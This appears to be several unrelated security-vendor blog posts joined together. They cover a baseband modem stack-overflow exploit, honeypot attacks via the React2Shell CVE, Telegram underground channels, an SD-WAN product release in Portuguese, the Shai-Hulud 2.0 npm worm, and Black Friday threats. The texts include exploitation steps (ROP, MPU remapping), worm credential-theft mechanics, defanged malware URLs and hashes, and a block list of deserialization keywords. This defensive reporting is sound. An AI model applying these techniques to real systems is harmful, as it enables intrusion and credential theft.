We focused on this protocol because it is used to establish a secure encrypted data transmission channel between the base station and the modem, and, in particular, it is used to transmit higher-layer NAS (Non-Access Stratum) protocol data. NAS represents the functional level of the 3G/UMTS protocol stack. Located between the user equipment (UE) and core network, it is responsible for signaling between them. This means that a remote code execution (RCE) vulnerability in RLC would allow an attacker to execute their own code on the modem, bypassing all existing 3G communication protection mechanisms.

3G protocol stack

The RLC protocol uses three different transmission modes: Transparent Mode (TM), Unacknowledged Mode (UM), and Acknowledged Mode (AM). We are only interested in UM, because in this mode the 3G standard allows both the segmentation of data and the concatenation of several small higher-layer data fragments (Protocol Data Units, PDU) into a single data link layer frame. This is done to maximize channel utilization. At the RLC level, packets are referred to as Service Data Units (SDU).

Among the approximately 75,000 different functions in the firmware, we found the function for handling an incoming SDU packet. When handling a received SDU packet, its header fields are parsed. The packet itself consists of a mandatory header, optional headers, and data. The number of optional headers is not limited. The end of the optional headers is indicated by the least significant bit (E bit) being equal to 0. The algorithm processes each header field sequentially, while their E-bits equal 1. During processing, data is written to a variable located on the stack of the calling function. The stack depth is 0xB4 bytes. The size of the packet that can be parsed (i.e., the number of headers, each header being a 2-byte entry on the stack) is limited by the SDU packet size of 0x5F0 bytes.

As a result, exploitation can be achieved using just one packet in which the number of headers exceeds the stack depth (90 headers). It is important to note that this particular function lacks a stack canary, and when the stack overflows, it is possible to overwrite the return address and some non-volatile register values in this function. However, overwriting is only possible with a value ending in one in binary (i.e., a value in which the least significant bit equals 1). Notably, execution takes place on ARM in Thumb mode, so all return addresses must have the least significant bit equal to 1. Coincidence? Perhaps.

In any case, sending the very first dummy SDU packet with the appropriate number of “correct” headers caused the device to reboot. However, at that moment, we had no way to obtain information on where and why the crash occurred (although we suspect the cause was an attempt to transfer control to the address 0xAABBCCDD, taken from our packet).

Gaining persistence in the system

The first and most important observation is that we know the pointer to the newly received SDU packet is stored in register R2. Return Oriented Programming (ROP) techniques can be used to execute our own code, but first we need to make sure it is actually possible.

We utilized the available AT command handler to move the data to RAM areas. Among the available AT commands, we found a suitable function – SPSERVICETYPE.

Next, we used ROP gadgets to overwrite the address 0x8CE56218 without disrupting the subsequent operation of the incoming SDU packet handling algorithm. To achieve this, it was sufficient to return to the function from which the SDU packet handler was called, because it was invoked as a callback, meaning there is no data linkage on the stack. Given that this function only added 0x2C bytes to the stack, we needed to fit within this size.

Stack overflow in the context of the operating system

Having found a suitable ROP chain, we launched an SDU packet containing it as a payload. As a result, we saw the output 0xAABBCCDD in the AT command console for SPSERVICETYPE. Our code worked!

Next, by analogy, we input the address of the stack frame where our data was located, but it turned out not to be executable. We then faced the task of figuring out the MPU settings on the modem. Once again, using the ROP chain method, we generated code that read the MPU table, one DWORD at a time. After many iterations, we obtained the following table.

The table shows what we suspected – the code section is only mapped for execution. An attempt to change the configuration resulted in another ROP chain, but this same section was now mapped with write permissions in an unused slot in the table. Because of MPU programming features, specifically the presence of the overlap mechanism and the fact that a region with a higher ID has higher priority, we were able to write to this section.

All that remained was to use the pointer to our data (still stored in R2) and patch the code section that had just been unlocked for writing. The question was what exactly to patch. The simplest method was to patch the NAS protocol handler by adding our code to it. To do this, we used one of the NAS protocol commands – MM information. This allowed us to send a large amount of data at once and, in response, receive a single byte of data using the MM status command, which confirmed the patching success.

As a result, we not only successfully executed our own code on the modem side but also established full two-way communication with the modem, using the high-level NAS protocol as a means of message delivery. In this case, it was an MM Status packet with the cause field equaling 0xAA.

However, being able to execute our own code on the modem does not give us access to user data. Or does it?

The full version of the article with a detailed description of the development of an AR exploit that led to Doom being run on the head unit is available on ICS CERT website.

On December 4, 2025, researchers published details on the critical vulnerability CVE-2025-55182, which received a CVSS score of 10.0. It has been unofficially dubbed React2Shell, as it affects React Server Components (RSC) functionality used in web applications built with the React library. RSC speeds up UI rendering by distributing tasks between the client and the server. The flaw is categorized as CWE-502 (Deserialization of Untrusted Data). It allows an attacker to execute commands, as well as read and write files in directories accessible to the web application, with the server process privileges.

Almost immediately after the exploit was published, our honeypots began registering attempts to leverage CVE-2025-55182. This post analyzes the attack patterns, the malware that threat actors are attempting to deliver to vulnerable devices, and shares recommendations for risk mitigation.

A brief technical analysis of the vulnerability

React applications are built on a component-based model. This means each part of the application or framework should operate independently and offer other components clear, simple methods for interaction. While this approach allows for flexible development and feature addition, it can require users to download large amounts of data, leading to inconsistent performance across devices. This is the challenge React Server Components were designed to address.

The vulnerability was found within the Server Actions component of RSC. To reach the vulnerable function, the attacker just needs to send a POST request to the server containing a serialized data payload for execution. Part of the functionality of the handler that allows for unsafe deserialization is illustrated below:

A comparison of the vulnerable (left) and patched (right) functions

CVE-2025-55182 on Kaspersky honeypots

As the vulnerability is rather simple to exploit, the attackers quickly added it to their arsenal. The initial exploitation attempts were registered by Kaspersky honeypots on December 5. By Monday, December 8, the number of attempts had increased significantly and continues to rise.

The number of CVE-2025-55182 attacks targeting Kaspersky honeypots, by day (download)

Attackers first probe their target to ensure it is not a honeypot: they run whoami, perform multiplication in bash, or compute MD5 or Base64 hashes of random strings to verify their code can execute on the targeted machine.

In most cases, they then attempt to download malicious files using command-line web clients like wget or curl. Additionally, some attackers deliver a PowerShell-based Windows payload that installs XMRig, a popular Monero crypto miner.

CVE-2025-55182 was quickly weaponized by numerous malware campaigns, ranging from classic Mirai/Gafgyt variants to crypto miners and the RondoDox botnet. Upon infecting a system, RondoDox wastes no time, its loader script immediately moving to eliminate competitors:

Beyond checking hardcoded paths, RondoDox also neutralizes AppArmor and SELinux security modules and employs more sophisticated methods to find and terminate processes with ELF files removed for disguise.

Only after completing these steps does the script download and execute the main payload by sequentially trying three different loaders: wget, curl, and wget from BusyBox. It also iterates through 18 different malware builds for various CPU architectures, enabling it to infect both IoT devices and standard x86_64 Linux servers.

In some attacks, instead of deploying malware, the adversary attempted to steal credentials for Git and cloud environments. A successful breach could lead to cloud infrastructure compromise, software supply chain attacks, and other severe consequences.

Risk mitigation measures

We strongly recommend updating the relevant packages by applying patches released by the developers of the corresponding modules and bundles.
Vulnerable versions of React Server Components:

• react-server-dom-webpack (19.0.0, 19.1.0, 19.1.1, 19.2.0)
• react-server-dom-parcel (19.0.0, 19.1.0, 19.1.1, 19.2.0)
• react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, 19.2.0)

Bundles and modules confirmed as using React Server Components:

• next
• react-router
• waku
• @parcel/rsc
• @vitejs/plugin-rsc
• rwsdk

To prevent exploitation while patches are being deployed, consider blocking all POST requests containing the following keywords in parameters or the request body:

• #constructor
• #__proto__
• #prototype
• vm#runInThisContext
• vm#runInNewContext
• child_process#execSync
• child_process#execFileSync
• child_process#spawnSync
• module#_load
• module#createRequire
• fs#readFileSync
• fs#writeFileSync
• s#appendFileSync

Conclusion

Due to the ease of exploitation and the public availability of a working PoC, threat actors have rapidly adopted CVE-2025-55182. It is highly likely that attacks will continue to grow in the near term.

We recommend immediately updating React to the latest patched version, scanning vulnerable hosts for signs of malware, and changing any credentials stored on them.

Indicators of compromise

Malware URLs
hxxp://172.237.55.180/b
hxxp://172.237.55.180/c
hxxp://176.117.107.154/bot
hxxp://193.34.213.150/nuts/bolts
hxxp://193.34.213.150/nuts/x86
hxxp://23.132.164.54/bot
hxxp://31.56.27.76/n2/x86
hxxp://31.56.27.97/scripts/4thepool_miner[.]sh
hxxp://41.231.37.153/rondo[.]aqu[.]sh
hxxp://41.231.37.153/rondo[.]arc700
hxxp://41.231.37.153/rondo[.]armeb
hxxp://41.231.37.153/rondo[.]armebhf
hxxp://41.231.37.153/rondo[.]armv4l
hxxp://41.231.37.153/rondo[.]armv5l
hxxp://41.231.37.153/rondo[.]armv6l
hxxp://41.231.37.153/rondo[.]armv7l
hxxp://41.231.37.153/rondo[.]i486
hxxp://41.231.37.153/rondo[.]i586
hxxp://41.231.37.153/rondo[.]i686
hxxp://41.231.37.153/rondo[.]m68k
hxxp://41.231.37.153/rondo[.]mips
hxxp://41.231.37.153/rondo[.]mipsel
hxxp://41.231.37.153/rondo[.]powerpc
hxxp://41.231.37.153/rondo[.]powerpc-440fp
hxxp://41.231.37.153/rondo[.]sh4
hxxp://41.231.37.153/rondo[.]sparc
hxxp://41.231.37.153/rondo[.]x86_64
hxxp://51.81.104.115/nuts/bolts
hxxp://51.81.104.115/nuts/x86
hxxp://51.91.77.94:13339/termite/51.91.77.94:13337
hxxp://59.7.217.245:7070/app2
hxxp://59.7.217.245:7070/c[.]sh
hxxp://68.142.129.4:8277/download/c[.]sh
hxxp://89.144.31.18/nuts/bolts
hxxp://89.144.31.18/nuts/x86
hxxp://gfxnick.emerald.usbx[.]me/bot
hxxp://meomeoli.mooo[.]com:8820/CLoadPXP/lix.exe?pass=PXPa9682775lckbitXPRopGIXPIL
hxxps://api.hellknight[.]xyz/js
hxxps://gist.githubusercontent[.]com/demonic-agents/39e943f4de855e2aef12f34324cbf150/raw/e767e1cef1c35738689ba4df9c6f7f29a6afba1a/setup_c3pool_miner[.]sh

MD5 hashes
0450fe19cfb91660e9874c0ce7a121e0
3ba4d5e0cf0557f03ee5a97a2de56511
622f904bb82c8118da2966a957526a2b
791f123b3aaff1b92873bd4b7a969387
c6381ebf8f0349b8d47c5e623bbcef6b
e82057e481a2d07b177d9d94463a7441

Telegram has won over users worldwide, and cybercriminals are no exception. While the average user chooses a messaging app based on convenience, user experience and stability (and perhaps, cool stickers), cybercriminals evaluate platforms through a different lens.

When it comes to anonymity, privacy and application independence – essential criteria for a shadow messaging app – Telegram is not as strong as its direct competitors.

• It lacks default end-to-end (E2E) encryption for chats.
• It has a centralized infrastructure: users cannot set up their own servers for communication.
• Its server-side code is closed: users cannot verify what it does.

This architecture requires a high degree of trust in the platform, but experienced cybercriminals prefer not to rely on third parties when it comes to protecting their operations and, more importantly, their personal safety.

That said, Telegram today is widely viewed and used not only as a communication tool (messaging service), but also as a full-fledged dark-market business platform – thanks to several features that underground communities actively exploit.

Is this research, we examine Telegram through the eyes of cybercriminals, evaluate its technical capabilities for running underground operations, and analyze the lifecycle of a Telegram channel from creation to digital death. For this purpose, we analyzed more than 800 blocked Telegram channels, which existed between 2021 and 2024.

Key findings

• The median lifespan of a shadow Telegram channel increased from five months in 2021–2022 to nine months in 2023–2024.
• The frequency of blocking cybercrime channels has been growing since October 2024.
• Cybercriminals have been migrating to other messaging services due to frequent blocks by Telegram.

You can find the full report on the Kaspersky Digital Footprint Intelligence website.

A implementação de redes de longa distância definidas por software (Software-Defined Wide Area Networks, SD-WANs) aumenta a eficiência operacional, reduz custos e melhora a segurança. Esses impactos são tão significativos que, às vezes, podem ser observados em escala nacional. De acordo com o artigo The Transformative Impact of SD-WAN on Society and Global Development (O impacto transformador das SD-WANs na sociedade e no desenvolvimento global) publicado no International Journal for Multidisciplinary Research, a adoção dessa tecnologia pode resultar em aumento de 1,38% no PIB de países em desenvolvimento. No nível corporativo, os efeitos são ainda mais evidentes. Por exemplo, na fabricação industrial moderna e profundamente digitalizada, pode reduzir o tempo de inatividade não planejado em 25%.

Além disso, os projetos de implementação de SD-WAN não apenas proporcionam um rápido retorno do investimento, como também continuam a oferecer benefícios adicionais e maior eficiência conforme a solução recebe atualizações e novas versões são lançadas. Para demonstrar isso, apresentamos o novo Kaspersky SD-WAN 2.5 e seus recursos mais relevantes.

Algoritmos otimizados de redirecionamento de tráfego

Esse é um recurso clássico de SD-WAN e uma das principais vantagens competitivas da tecnologia. O roteamento do tráfego depende da natureza e da localização do aplicativo corporativo, mas também leva em conta as prioridades atuais e as condições da rede: em alguns casos, a confiabilidade é essencial; em outros, a velocidade ou a baixa latência são o fator decisivo. A nova versão do Kaspersky SD-WAN aprimora o algoritmo e passa a incluir dados detalhados sobre a perda de tráfego em cada caminho possível. Isso garante o funcionamento estável de serviços críticos em redes geograficamente distribuídas, por exemplo, ao reduzir falhas em videoconferências nacionais de grande escala. O mais importante é que esse aumento de confiabilidade vem acompanhado da redução da carga de trabalho de engenheiros de rede e equipes de suporte, já que o processo de adaptação de rotas é completamente automatizado.

Encaminhamento condicional de DNS

Esse recurso otimiza a velocidade de resolução de nomes de domínio e ajuda a manter as políticas de segurança para diferentes tipos de aplicativos. Por exemplo, as solicitações relacionadas à infraestrutura em nuvem do MS Office são encaminhadas diretamente do escritório local à CDN da Microsoft, enquanto os nomes de servidores da rede interna são resolvidos por meio do servidor DNS corporativo. Essa abordagem melhora significativamente a velocidade de estabelecimento das conexões e elimina a necessidade de configurar manualmente os roteadores em cada escritório. Em vez disso, uma única política unificada é suficiente para toda a rede.

Alterações programadas de configuração de CPE

Qualquer reconfiguração de rede em larga escala aumenta o risco de interrupções (mesmo que breves) e falhas. Para garantir que esse tipo de evento não prejudique processos críticos de negócios, qualquer alteração de política no Kaspersky SD-WAN pode ser programada para um horário específico. Quer alterar as configurações de roteadores em cem escritórios ao mesmo tempo? Programe a alteração para as 2h no horário local ou para a manhã de sábado. Isso elimina a necessidade de a equipe regional de TI estar fisicamente presente durante a implementação.

Depuração simplificada de BGP e OSPF

A análise do roteamento BGP agora pode ser realizada inteiramente pela interface gráfica do orquestrador. Surgiu um loop de roteamento repentinamente em algum ponto entre os escritórios de Milão e Paris? Em vez de acessar cada equipamento em todos os escritórios e nós intermediários via SSH, você agora pode identificar e resolver o problema por meio de uma única interface, reduzindo significativamente o tempo de inatividade.

Substituição fácil de CPE

Se o equipamento de rede em um escritório precisar ser substituído, agora é possível manter todas as configurações existentes ao substituí-lo. O técnico no escritório simplesmente conecta a nova unidade CPE, e o orquestrador do Kaspersky SD-WAN restaura automaticamente todas as políticas e túneis no dispositivo. Isso oferece vários benefícios imediatos: reduz significativamente o tempo de inatividade; a substituição pode ser realizada por um técnico sem conhecimento aprofundado de protocolos de rede; e diminui consideravelmente a probabilidade de falhas adicionais causadas por erros de configuração manual.

Diagnóstico de LTE

Embora frequentemente seja o canal de comunicação corporativa mais rápido e econômico de implantar, o LTE apresenta uma desvantagem: a instabilidade. Tanto a cobertura celular quanto a velocidade operacional podem variar com frequência, exigindo que os engenheiros de rede tomem providências, como realocar o CPE para uma área com melhor sinal. Agora, você pode tomar essas decisões com base em dados de diagnóstico coletados diretamente pelo orquestrador. Ele exibe os parâmetros de serviço dos dispositivos LTE conectados, incluindo o nível de intensidade do sinal.

Gerenciamento de falhas de energia

Para empresas com os requisitos mais rigorosos de tolerância a falhas e tempo de recuperação, estão disponíveis, mediante solicitação especial, variantes de CPE especializadas e equipadas com uma pequena fonte interna de energia. Em casos de queda de energia, o CPE poderá enviar dados detalhados sobre o tipo de falha para o orquestrador. Isso dá aos administradores tempo para investigar a causa e resolver o problema muito mais rapidamente.

Estas são apenas algumas das inovações do Kaspersky SD-WAN. Outros recursos incluem a capacidade de configurar políticas de segurança para conexões com a porta de console do CPE, além do suporte a redes de grande escala com mais de 2 mil CPEs e balanceamento de carga entre múltiplos orquestradores. Para saber mais sobre como todos esses novos recursos aumentam o valor do SD-WAN para a sua organização, nossos especialistas estão disponíveis para oferecer uma demonstração personalizada.

In September, a new breed of malware distributed via compromised Node Package Manager (npm) packages made headlines. It was dubbed “Shai-Hulud”, and we published an in-depth analysis of it in another post. Recently, a new version was discovered.

Shai Hulud 2.0 is a type of two-stage worm-like malware that spreads by compromising npm tokens to republish trusted packages with a malicious payload. More than 800 npm packages have been infected by this version of the worm.

According to our telemetry, the victims of this campaign include individuals and organizations worldwide, with most infections observed in Russia, India, Vietnam, Brazil, China, Türkiye, and France.

Technical analysis

When a developer installs an infected npm package, the setup_bun.js script runs during the preinstall stage, as specified in the modified package.json file.

Bootstrap script

The initial-stage script setup_bun.js is left intentionally unobfuscated and well documented to masquerade as a harmless tool for installing the legitimate Bun JavaScript runtime. It checks common installation paths for Bun and, if the runtime is missing, installs it from an official source in a platform-specific manner. This seemingly routine behavior conceals its true purpose: preparing the execution environment for later stages of the malware.

The installed Bun runtime then executes the second-stage payload, bun_environment.js, a 10MB malware script obfuscated with an obfuscate.io-like tool. This script is responsible for the main malicious activity.

Stealing credentials

Shai Hulud 2.0 is built to harvest secrets from  various environments. Upon execution, it immediately searches several sources for sensitive data, such as:

• GitHub secrets: the malware searches environment variables and the GitHub CLI configuration for values starting with ghp_ or gho_. It also creates a malicious workflow yml in victim repositories, which is then used to obtain GitHub Actions secrets.
• Cloud credentials: the malware searches for cloud credentials across AWS, Azure, and Google Cloud by querying cloud instance metadata services and using official SDKs to enumerate credentials from environment variables and local configuration files.
• Local files: it downloads and runs the TruffleHog tool to aggressively scan the entire filesystem for credentials.

Then all the exfiltrated data is sent through the established communication channel, which we describe in more detail in the next section.

Data exfiltration through GitHub

To exfiltrate the stolen data, the malware sets up a communication channel via a public GitHub repository. For this purpose, it uses  the victim’s GitHub access token if found in environment variables and the GitHub CLI configuration.

After that, the malware creates a repository with a randomly generated 18-character name and a marker in its description. This repository then serves as a data storage to which all stolen credentials and system information are uploaded.

If the token is not found, the script attempts to obtain a previously stolen token from another victim by searching through GitHub repositories for those containing the text, “Sha1-Hulud: The Second Coming.” in the description.

Worm spreading across packages

For subsequent self-replication via embedding into npm packages, the script scans .npmrc configuration files in the home directory and the current directory in an attempt to find an npm registry authorization token.

If this is successful, it validates the token by sending a probe request to the npm /-/whoami API endpoint, after which the script retrieves a list of up to 100 packages maintained by the victim.

For each package, it injects the malicious files setup_bun.js and bun_environment.js via bundleAssets and updates the package configuration by setting setup_bun.js as a pre-installation script and incrementing the package version. The modified package is then published to the npm registry.

Destructive responses to failure

If the malware fails to obtain a valid npm token and is also unable to get a valid GitHub token, making data exfiltration impossible, it triggers a destructive payload that wipes user files, primarily those in the home directory.

Our solutions detect the family described here as HEUR:Worm.Script.Shulud.gen.

Since September of this year, Kaspersky has blocked over 1700 Shai Hulud 2.0 attacks on user machines. Of these, 18.5% affected users in Russia, 10.7% occurred in India, and 9.7% in Brazil.

The global e‑commerce market is accelerating faster than ever before, driven by expanding online retail, and rising consumer adoption worldwide. According to McKinsey Global Institute, global e‑commerce is projected to grow by 7–9% annually through 2040.

At Kaspersky, we track how this surge in online shopping activity is mirrored by cyber threats. In 2025, we observed attacks which targeted not only e‑commerce platform users but online shoppers in general, including those using digital marketplaces, payment services and apps for everyday purchases. This year, we additionally analyzed how cybercriminals exploited gaming platforms during Black Friday, as the gaming industry has become an integral part of the global sales calendar. Threat actors have been ramping up their efforts during peak sales events like Black Friday, exploiting high demand and reduced user vigilance to steal personal data, funds, or spread malware.

This report continues our annual series of analyses published on Securelist in 2021, 2022, 2023, and  2024, which examine the evolving landscape of shopping‑related cyber threats.

Methodology

To track how the shopping threat landscape continues to evolve, we conduct an annual assessment of the most common malicious techniques, which span financial malware, phishing pages that mimic major retailers, banks, and payment services, as well as spam campaigns that funnel users toward fraudulent sites. In 2025, we also placed a dedicated focus on gaming-related threats, analyzing how cybercriminals leverage players’ interest. The threat data we rely on is sourced from the Kaspersky Security Network (KSN), which processes anonymized cybersecurity data shared consensually by Kaspersky users. This report draws on data collected from January through October 2025.

Key findings

• In the first ten months of 2025, Kaspersky identified nearly 6.4 million phishing attacks which targeted users of online stores, payment systems, and banks.
• As many as 48.2% of these attacks were directed at online shoppers.
• We blocked more than 146,000 Black Friday-themed spam messages in the first two weeks of November.
• Kaspersky detected more than 2 million phishing attacks related to online gaming.
• Around 1.09 million banking-trojan attacks were recorded during the 2025 Black Friday season.
• The number of attempted attacks on gaming platforms surged in 2025, reaching more than 20 million, a significant increase compared to previous years.
• More than 18 million attempted malicious attacks were disguised as Discord in 2025, a more than 14-time increase year-over-year, while Steam remained within its usual five-year fluctuation range.

Shopping fraud and phishing

Phishing and scams remain among the most common threats for online shoppers, particularly during high-traffic retail periods when users are more likely to act quickly and rely on familiar brand cues. Cybercriminals frequently recreate the appearance of legitimate stores, payment pages, and banking services, making their fraudulent sites and emails difficult to distinguish from real ones. With customers navigating multiple offers and payment options, they may overlook URL or sender details, increasing the likelihood of credential theft and financial losses.

From January through to October 2025, Kaspersky products successfully blocked 6,394,854 attempts to access phishing links which targeted users of online stores, payment systems, and banks. Breaking down these attempts, 48.21% had targeted online shoppers (for comparison, this segment accounted for 37.5% in 2024), 26.10% targeted banking users (compared to 44.41% in 2024), and 25.69% mimicked payment systems (18.09% last year). Compared to previous years, there has been a noticeable shift in focus, with attacks against online store users now representing a larger share, reflecting cybercriminals’ continued emphasis on exploiting high-demand retail periods, while attacks on banking users have decreased in relative proportion. This may be related to online banking protection hardening worldwide.

In 2025, Kaspersky products detected and blocked 606,369 phishing attempts involving the misuse of Amazon’s brand. Cybercriminals continued to rely on Amazon-themed pages to deceive users and obtain personal or financial information.

Other major e-commerce brands were also impersonated. Attempts to visit phishing pages mimicking Alibaba brands, such as AliExpress, were detected 54,500 times, while eBay-themed pages appeared in 38,383 alerts. The Latin American marketplace Mercado Libre was used as a lure in 8,039 cases, and Walmart-related phishing pages were detected 8,156 times.

In 2025, phishing campaigns also extensively mimicked other online platforms. Netflix-themed pages were detected 801,148 times, while Spotify-related attempts reached 576,873. This pattern likely reflects attackers’ continued focus on high-traffic digital entertainment services with in-service payments enabled, which can be monetized via stolen accounts.

How scammers exploited shopping hype in 2025

In 2025, Black Friday-related scams continued to circulate across multiple channels, with fraudulent email campaigns remaining one of the key distribution methods. As retailers increase their seasonal outreach, cybercriminals take advantage of the high volume of promotional communications by sending look-alike messages that direct users to scam and phishing pages. In the first two weeks of November, 146,535 spam messages connected to seasonal sales were detected by Kaspersky, including 2,572 messages referencing Singles day sales.

Scammers frequently attempt to mimic well-known platforms to increase the credibility of their messages. In one of the recurring campaigns, a pattern seen year after year, cybercriminals replicated Amazon’s branding and visual style, promoting supposedly exclusive early-access discounts of up to 70%. In this particular case, the attackers made almost no changes to the text used in their 2024 campaign, again prompting users to follow a link leading to a fraudulent page. Such pages are usually designed to steal their personal or payment information or to trick the user into buying non-existent goods.

Beyond the general excitement around seasonal discounts, scammers also try to exploit consumers’ interest in newly released Apple devices. To attract attention, they use the same images of the latest gadgets across various mailing campaigns, just changing the names of legitimate retailers that allegedly sell the brand.

As subscription-based streaming platforms also take part in global sales periods, cybercriminals attempt to take advantage of this interest as well. For example, we observed a phishing website where scammers promoted an offer for a “12-month subscription bundle” covering several popular services at once, asking users to enter their bank card details. To enhance credibility, the scammers also include fabricated indicators of numerous successful purchases from other “users,” making the offer appear legitimate.

In addition to imitating globally recognized platforms, scammers also set up fake pages that pretend to be local services in specific countries. This tactic enables more targeted campaigns that blend into the local online landscape, increasing the chances that users will perceive the fraudulent pages as legitimate and engage with them.

Non-existent Norwegian online store and popular Labubu toys sale

Banking Trojans

Banking Trojans, or “bankers,” are another tool for cybercriminals exploiting busy shopping seasons like Black Friday in 2025. They are designed to steal sensitive data from online banking and payment systems. In this section, we’ll focus on PC bankers. Once on a victim’s device, they monitor the browser and, when the user visits a targeted site, can use techniques like web injection or form-grabbing to capture login credentials, credit card information, and other personal data. Some trojans also watch the clipboard for crypto wallet addresses and replace them with those controlled by the malicious actors.

As online shopping peaks during major sales events, attackers increasingly target e-commerce platforms alongside banks. Trojans may inject fake forms into legitimate websites, tricking users into revealing sensitive data during checkout and increasing the risk of identity theft and financial fraud. In 2025, Kaspersky detected over 1,088,293* banking Trojan attacks. Among notable banker-related cases analysed by Kaspersky throughout the year, campaigns involving the new Maverick banking Trojan distributed via WhatsApp, as well as the Efimer Trojan which spread through malicious emails and compromised WordPress sites can be mentioned, both illustrating how diverse and adaptive banking Trojan delivery methods are.

*These statistics include globally active banking malware, and malware for ATMs and point-of-sale (PoS) systems. We excluded data on Trojan-banker families that no longer use banking Trojan functionality in their attacks, such as Emotet.

A holiday sales season on the dark web

Apparently, even the criminal underground follows its own version of a holiday sales season. Once data is stolen, it often ends up on dark-web forums, where cybercriminals actively search for buyers. This pattern is far from new, and the range of offers has remained largely unchanged over the past two years.

Threat actors consistently seize the opportunity to attract “new customers,” advertising deep discounts tied to high-profile global sales events. It is worth noting that year after year we see the same established services announce their upcoming promotions in the lead-up to Black Friday, almost as if operating on a retail calendar of their own.

We also noted that dark web forum participants themselves eagerly await these seasonal markdowns, hoping to obtain databases at the most favorable rates and expressing their wishes in forum posts. In the months before Black Friday, posts began appearing on carding-themed forums advertising stolen payment-card data at promotional prices.

Threats targeting gaming

The gaming industry faces a high concentration of scams and other cyberthreats due to its vast global audience and constant demand for digital goods, updates, and in-game advantages. Players often engage quickly with new offers, making them more susceptible to deceptive links or malicious files. At the same time, the fact that gamers often download games, mods, skins etc. from third-party marketplaces, community platforms, and unofficial sources creates additional entry points for attackers.

The number of attempted attacks on platforms beloved by gamers increased dramatically in 2025, reaching 20,188,897 cases, a sharp rise compared to previous years.

The nearly sevenfold increase in 2025 is most likely linked to the Discord block by some countries introduced at the end of 2024. Eventually users rely on alternative tools, proxies and modified clients. This change significantly expanded the attack surface, making users more vulnerable to fake installers, and malicious updates disguised as workarounds for the restriction.

It can also be seen in the top five most targeted gaming platforms of 2025:

In previous years, Steam consistently ranked as the platform with the highest number of attempted attacks. Its extensive game library, active modding ecosystem, and long-standing role in the gaming community made it a prime target for cybercriminals distributing malicious files disguised as mods, cheats, or cracked versions. In 2025, however, the landscape changed significantly. The gap between Steam and Discord expanded to an unprecedented degree as Steam-related figures remained within their typical fluctuation range of the past five years,  while the number of attempted Discord-disguised attacks surged more than 14 times compared to 2024, reshaping the hierarchy of targeted gaming platforms.

Attempts to attack users through malicious or unwanted files disguised as Steam and Discord throughout the reported period (download)

From January to October, 2025, cybercriminals used a variety of cyberthreats disguised as popular related to gamers platforms, modifications or circumvention options. RiskTool dominated the threat landscape with 17,845,099 detections, far more than any other category. Although not inherently malicious, these tools can hide files, mask processes, or disable programs, making them useful for stealthy, persistent abuse, including covert crypto-mining. Downloaders ranked second with 1,318,743 detections. These appear harmless but may fetch additional malware among other downloaded files. Downloaders are typically installed when users download unofficial patches, cracked clients, or mods. Trojans followed with 384,680 detections, often disguised as cheats or mod installers. Once executed, they can steal credentials, intercept tokens, or enable remote access, leading to account takeovers and the loss of in-game assets.

Phishing and scam threats targeting gamers

In addition to tracking malicious and unwanted files disguised as gamers’ platforms, Kaspersky experts also analysed phishing pages which impersonated these services. Between January and October 2025, Kaspersky products detected 2,054,336 phishing attempts targeting users through fake login pages, giveaway offers, “discounted” subscriptions and other scams which impersonated popular platforms like Steam, PlayStation, Xbox and gaming stores.

Example of Black Friday scam using a popular shooter as a lure

The page shown in the screenshot is a typical Black Friday-themed scam that targets gamers, designed to imitate an official Valorant promotion. The “Valorant Points up to 80% off” banner, polished layout, and fake countdown timer create urgency and make the offer appear credible at first glance. Users who proceed are redirected to a fake login form requesting Riot account credentials or bank card details. Once submitted, this information enables attackers to take over accounts, steal in-game assets, or carry out fraudulent transactions.

Minor text errors reveal the page’s fraudulent nature. The phrase “You should not have a size limit of 5$ dollars in your account” is grammatically incorrect and clearly suspicious.

Another phishing page relies on a fabricated “Winter Gift Marathon” that claims to offer a free $20 Steam gift card. The seasonal framing, combined with a misleading counter (“251,110 of 300,000 cards received”), creates an artificial sense of legitimacy and urgency intended to prompt quick user interaction.

The central component of the scheme is the “Sign in” button, which redirects users to a spoofed Steam login form designed to collect their credentials. Once obtained, attackers can gain full access to the account, including payment methods, inventory items, and marketplace assets, and may be able to compromise additional services if the same password is used elsewhere.

Scams themed around the PlayStation 5 Pro and Xbox Series X appear to be generated from a phishing kit, a reusable template that scammers adapt for different brands. Despite referencing two consoles, both pages follow the same structure which features a bold claim offering a chance to “win” a high-value device, a large product image on the left, and a minimalistic form on the right requesting the user’s email address.

A yellow banner promotes an “exclusive offer” with “limited availability,” pressuring users to respond quickly. After submitting an email, victims are typically redirected to additional personal and payment data-collection forms. They also may later be targeted with follow-up phishing emails, spam, or malicious links.

Conclusions

In 2025, the ongoing expansion of global e-commerce continued to be reflected in the cyberthreat landscape, with phishing, scam activity, and financial malware targeting online shoppers worldwide. Peak sales periods once again created favorable conditions for fraud, resulting in sustained activity involving spoofed retailer pages, fraudulent email campaigns, and seasonal spam.

Threat actors also targeted users of digital entertainment and subscription services. The gaming sector experienced a marked increase in malicious activity, driven by shifts in platform accessibility and the widespread use of third-party tools. The significant rise in malicious detections associated with Discord underscored how rapidly attackers adjust to changes in user behavior.

Overall, 2025 demonstrated that cybercriminals continue to leverage predictable user behavior patterns and major sales events to maximize the impact of their operations. Consumers should remain especially vigilant during peak shopping periods and use stronger security practices, such as two-factor authentication, secure payment methods, and cautious browsing. A comprehensive security solution that blocks malware, detects phishing pages, and protects financial data can further reduce the risk of falling victim to online threats.